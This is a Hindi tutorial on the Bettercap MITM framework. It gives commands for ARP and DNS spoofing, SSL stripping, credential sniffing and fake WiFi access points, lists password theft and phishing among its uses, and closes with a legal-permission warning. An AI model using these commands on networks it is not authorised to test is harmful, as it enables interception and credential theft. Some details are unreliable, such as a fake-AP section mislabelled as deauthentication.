⚡ Bettercap - Advanced MITM & Network Attack Framework

🔍 MITM Framework 🌐 Network Attacks 🕸️ WiFi & Bluetooth

Category: 7️⃣ Sniffing & Spoofing

📝 Description

Bettercap एक शक्तिशाली, मॉड्यूलर, और एडवांस्ड मैन-इन-द-मिडिल (MITM) फ्रेमवर्क है। यह Ettercap का आधुनिक और ज्यादा फीचर्स वाला वर्शन है। Bettercap ARP स्पूफिंग, DNS स्पूफिंग, HTTP/HTTPS स्निफिंग, WiFi नेटवर्क अटैक, Bluetooth अटैक, और बहुत कुछ कर सकता है। यह Go भाषा में लिखा गया है और रियल-टाइम API, वेब UI, और कमांड लाइन इंटरफेस के साथ आता है।

विशेषता: Bettercap की सबसे बड़ी खासियत है इसका रियल-टाइम वेब UI और API। आप ब्राउज़र से सारे अटैक्स को कंट्रोल कर सकते हैं, लाइव देख सकते हैं, और ऑटोमेट कर सकते हैं। यह HTTPS ट्रैफिक को भी स्निफ कर सकता है (SSLSTRIP + SSLSPLIT)।

📦 Installation

Kali Linux (पहले से इंस्टॉल):

bettercap -h

Ubuntu/Debian:

sudo apt update
sudo apt install bettercap -y

Go से इंस्टॉल:

sudo apt install golang
go install github.com/bettercap/bettercap@latest

GitHub से इंस्टॉल:

git clone https://github.com/bettercap/bettercap.git
cd bettercap
make build
sudo make install

💻 Common Commands (उदाहरण सहित)

📌 Bettercap शुरू करना (कमांड लाइन):

sudo bettercap

👉 उदाहरण: इंटरएक्टिव कंसोल शुरू होता है। help टाइप करें सभी कमांड्स देखने के लिए।

🔹 1. Web UI शुरू करना (ब्राउज़र से कंट्रोल):

sudo bettercap -eval "set api.rest.username admin; set api.rest.password admin; api.rest on"

👉 उदाहरण: Web UI http://127.0.0.1:80 पर उपलब्ध होगा।

🔹 2. नेटवर्क स्कैन करना:

net.probe on
net.show

👉 उदाहरण: नेटवर्क में लाइव होस्ट्स ढूँढता है।

🔹 3. ARP स्पूफिंग (MITM) शुरू करना:

set arp.spoof.targets 192.168.1.100
arp.spoof on

👉 उदाहरण: 192.168.1.100 टारगेट पर ARP स्पूफिंग शुरू करता है।

🔹 4. HTTP/HTTPS स्निफिंग:

net.sniff on

👉 उदाहरण: सभी HTTP और HTTPS ट्रैफिक स्निफ करता है (पासवर्ड, कुकीज़, आदि)।

🔹 5. DNS स्पूफिंग:

set dns.spoof.domains *.google.com,*.facebook.com
set dns.spoof.address 192.168.1.50
dns.spoof on

👉 उदाहरण: google.com और facebook.com को 192.168.1.50 पर रीडायरेक्ट करता है।

🔹 6. HTTPS स्ट्रिपिंग (SSLSTRIP):

set https.proxy.sslstrip true
https.proxy on

👉 उदाहरण: HTTPS को HTTP में डाउनग्रेड करता है, जिससे ट्रैफिक प्लेन टेक्स्ट में दिखता है।

🔹 7. WiFi डीऑथेंटिकेशन अटैक:

wifi.ap.ssid "FakeWiFi"
wifi.ap.channel 6
wifi.ap on

👉 उदाहरण: फेक WiFi एक्सेस प्वाइंट बनाता है।

🔹 8. कैप्चर किए गए क्रेडेंशियल्स देखना:

net.sniff.credentials

👉 उदाहरण: HTTP, FTP, IMAP, POP3 से स्निफ किए गए पासवर्ड दिखाता है।

🔹 9. सभी कैप्चर किए गए पैकेट्स देखना:

net.sniff.view

🔹 10. एक्सटर्नल कमांड चलाना:

!nmap -sV 192.168.1.1

👉 उदाहरण: Nmap कमांड को Bettercap के अंदर से चलाता है।

🔹 11. स्क्रिप्ट चलाना:

events.stream on
caplets.list
caplets.show arp.spoof
arp.spoof on

🔹 12. रिपोर्ट जनरेट करना:

net.sniff on
net.sniff.export /root/capture.pcap

🎯 Bettercap के मुख्य मॉड्यूल:

arp.spoof: ARP स्पूफिंग (MITM)
net.sniff: HTTP/HTTPS ट्रैफिक स्निफिंग
dns.spoof: DNS स्पूफिंग
https.proxy: HTTPS प्रॉक्सी (SSLSTRIP, SSLSPLIT)
wifi: WiFi अटैक्स (डीऑथेंटिकेशन, फेक AP)
bluetooth: Bluetooth अटैक्स
tcp.proxy: TCP कनेक्शन इंटरसेप्ट
http.server: फेक HTTP सर्वर (फिशिंग)
https.server: फेक HTTPS सर्वर
events.stream: रियल-टाइम इवेंट्स

🎯 Use Cases (उपयोग के तरीके)

पेनिट्रेशन टेस्टिंग: MITM अटैक, ARP स्पूफिंग, DNS स्पूफिंग, HTTPS स्निफिंग।
WiFi सिक्योरिटी ऑडिट: डीऑथेंटिकेशन अटैक, फेक एक्सेस प्वाइंट, WPA हैंडशेक कैप्चर।
Bluetooth अटैक: Bluetooth डिवाइस स्कैन और अटैक।
पासवर्ड स्निफिंग: HTTP, FTP, IMAP, POP3 से पासवर्ड चुराना।
फिशिंग: फेक वेबसाइट बनाकर यूजर से क्रेडेंशियल्स चुराना।

⚙️ Key Features (मुख्य विशेषताएँ)

✔️ ARP स्पूफिंग, DNS स्पूफिंग, DHCP स्पूफिंग
✔️ HTTP/HTTPS स्निफिंग (SSLSTRIP, SSLSPLIT)
✔️ WiFi अटैक्स (WPA हैंडशेक, डीऑथेंटिकेशन, फेक AP)
✔️ Bluetooth अटैक्स (BLE स्कैन, स्निफिंग)
✔️ रियल-टाइम वेब UI और REST API
✔️ कस्टम कैपलेट्स (स्क्रिप्ट्स)
✔️ इंटरएक्टिव कमांड लाइन (कम्प्लीशन के साथ)
✔️ गो में लिखा, तेज और क्रॉस-प्लेटफॉर्म
✔️ नेटवर्क डिस्कवरी और होस्ट प्रोफाइलिंग
✔️ क्रेडेंशियल्स ऑटो-कैप्चर और स्टोर
✔️ PCAP फॉर्मेट में कैप्चर सेव करना

📌 Bettercap Web UI फीचर्स:

Dashboard: सभी मॉड्यूल्स की स्थिति
Networks: नेटवर्क होस्ट्स और WiFi नेटवर्क्स
Events: रियल-टाइम इवेंट्स (क्रेडेंशियल्स, डिस्कवरी, आदि)
Sessions: सक्रिय सेशन्स
Caplets: कैपलेट्स मैनेजर

📌 Bettercap vs Ettercap:

Bettercap: आधुनिक, Go में लिखा, वेब UI, HTTPS सपोर्ट, WiFi/Bluetooth अटैक, API
Ettercap: पुराना, C में लिखा, सिर्फ कमांड लाइन/GUI, सीमित HTTPS सपोर्ट
अनुशंसा: Bettercap एडवांस्ड अटैक के लिए, Ettercap सिंपल MITM के लिए।

📌 Bettercap के लिए सुझाव:

हमेशा IP फॉरवर्डिंग चालू करें: echo 1 > /proc/sys/net/ipv4/ip_forward
Web UI के लिए REST API यूजर/पासवर्ड सेट करें
कैपलेट्स (caplets) का उपयोग करें: caplets.list और caplets.show
HTTPS स्ट्रिपिंग के लिए https.proxy.sslstrip true सेट करें
स्निफ किए गए क्रेडेंशियल्स देखने के लिए net.sniff.credentials

🔗 Official Resources

Official Website: https://www.bettercap.org
GitHub Repository: https://github.com/bettercap/bettercap
Documentation: Bettercap Docs
Caplets: Official Caplets

🔧 Related Tools (समान उपकरण)

Ettercap: पुराना MITM टूल
Wireshark: पैकेट एनालिसिस
tcpdump: कमांड लाइन पैकेट कैप्चर
MITMf: MITM फ्रेमवर्क
Eaphammer: WiFi अटैक टूल

⚠️ Important Note (सावधानी)

Bettercap एक बेहद शक्तिशाली MITM और नेटवर्क अटैक फ्रेमवर्क है। इसका उपयोग केवल उन्हीं नेटवर्क पर करें जिनकी आपको लिखित अनुमति हो। बिना अनुमति के ARP स्पूफिंग, DNS स्पूफिंग, पासवर्ड स्निफिंग, या WiFi अटैक करना कानूनी अपराध है। हमेशा अपने खुद के नेटवर्क, CTF चैलेंज, या बग बाउंटी प्रोग्राम पर ही प्रैक्टिस करें। Bettercap के HTTPS स्ट्रिपिंग फीचर से सुरक्षित वेबसाइट्स भी असुरक्षित हो सकती हैं, इसलिए प्रोडक्शन नेटवर्क पर सावधानी से उपयोग करें।